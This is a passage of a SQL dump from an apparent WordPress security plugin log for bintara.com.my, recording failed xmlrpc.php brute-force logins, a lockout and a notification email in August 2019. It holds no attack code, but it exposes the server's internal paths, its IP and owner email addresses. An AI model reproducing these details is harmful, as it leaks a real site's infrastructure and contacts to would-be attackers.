password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJyoir4pgxiIHnHK4qQgAAAdQ\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"193.239.44.121\";s:11:\"REMOTE_PORT\";s:5:\"43968\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJyoir4pgxiIHnHK4qQgAAAdQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853578.5317\";s:12:\"REQUEST_TIME\";s:10:\"1566853578\";}}','notice','2019-08-26 21:06:20','2019-08-26 21:06:18',18306024,19507656,'http://bintara.com.my/new/xmlrpc.php',1,0,'193.239.44.121'),(23304,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp2/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/wp2/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp2/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJzYir4pgxiIHnHK4qRAAAAcQ\";s:12:\"REDIRECT_URL\";s:15:\"/wp2/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"66.147.244.147\";s:11:\"REMOTE_PORT\";s:5:\"42495\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/wp2/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/wp2/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJzYir4pgxiIHnHK4qRAAAAcQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853581.4408\";s:12:\"REQUEST_TIME\";s:10:\"1566853581\";}}','notice','2019-08-26 21:06:23','2019-08-26 21:06:21',18306704,19507096,'http://bintara.com.my/wp2/xmlrpc.php',1,0,'66.147.244.147'),(23305,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/v2/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/v2/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/v2/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJzIir4pgxiIHnHK4qQwAAAdM\";s:12:\"REDIRECT_URL\";s:14:\"/v2/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.235.104.73\";s:11:\"REMOTE_PORT\";s:5:\"59947\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/v2/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/v2/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJzIir4pgxiIHnHK4qQwAAAdM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853580.9768\";s:12:\"REQUEST_TIME\";s:10:\"1566853580\";}}','notice','2019-08-26 21:06:24','2019-08-26 21:06:21',18309792,19593872,'http://bintara.com.my/v2/xmlrpc.php',1,0,'103.235.104.73'),(23306,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/portal/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJ2BTEVi0fEJEHuDZcgwAAABg\";s:12:\"REDIRECT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"43.241.73.157\";s:11:\"REMOTE_PORT\";s:5:\"45594\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJ2BTEVi0fEJEHuDZcgwAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566853593.035\";s:12:\"REQUEST_TIME\";s:10:\"1566853593\";}}','notice','2019-08-26 21:06:35','2019-08-26 21:06:33',18311504,19502528,'http://bintara.com.my/portal/xmlrpc.php',1,0,'43.241.73.157'),(23307,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/staging/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"355\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJ7x90bn5mtr-PXqq5eAAAAFA\";s:12:\"REDIRECT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.229.72.73\";s:11:\"REMOTE_PORT\";s:5:\"51710\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJ7x90bn5mtr-PXqq5eAAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853615.1169\";s:12:\"REQUEST_TIME\";s:10:\"1566853615\";}}','notice','2019-08-26 21:06:58','2019-08-26 21:06:55',18309704,19594416,'http://bintara.com.my/staging/xmlrpc.php',1,0,'103.229.72.73'),(23308,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/staging/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJ-w0@TGWC-1tzGX5fzQAAAJY\";s:12:\"REDIRECT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"69.89.31.84\";s:11:\"REMOTE_PORT\";s:5:\"60615\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJ-w0@TGWC-1tzGX5fzQAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853631.1823\";s:12:\"REQUEST_TIME\";s:10:\"1566853631\";}}','notice','2019-08-26 21:07:13','2019-08-26 21:07:11',18311488,19504568,'http://bintara.com.my/staging/xmlrpc.php',1,0,'69.89.31.84'),(23309,0,'lockout','username-lockout::bintara.com.my','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:14:\"bintara.com.my\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-08-27 05:07:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-08-26 21:07:11\";s:14:\"lockout_expire\";s:19:\"2019-08-27 05:22:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-08-26 21:22:11\";s:16:\"lockout_username\";s:14:\"bintara.com.my\";}','action','2019-08-26 21:07:13','2019-08-26 21:07:11',18382456,19504568,'http://bintara.com.my/staging/xmlrpc.php',1,0,'69.89.31.84'),(23310,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-08-26 21:07:13','2019-08-26 21:07:11',18589168,19504568,'http://bintara.com.my/staging/xmlrpc.php',1,0,'69.89.31.84'),(23311,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/newsite/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/newsite/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/newsite/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRKDhTEVi0fEJEHuDZclQAAAA8\";s:12:\"REDIRECT_URL\";s:19:\"/newsite/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"50.116.64.13\";s:11:\"REMOTE_PORT\";s:5:\"19841\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/newsite/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/newsite/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRKDhTEVi0fEJEHuDZclQAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853646.7782\";s:12:\"REQUEST_TIME\";s:10:\"1566853646\";}}','notice','2019-08-26 21:07:28','2019-08-26 21:07:27',18302800,19504256,'http://bintara.com.my/newsite/xmlrpc.php',1,0,'50.116.64.13'),(23312,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/v2/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AG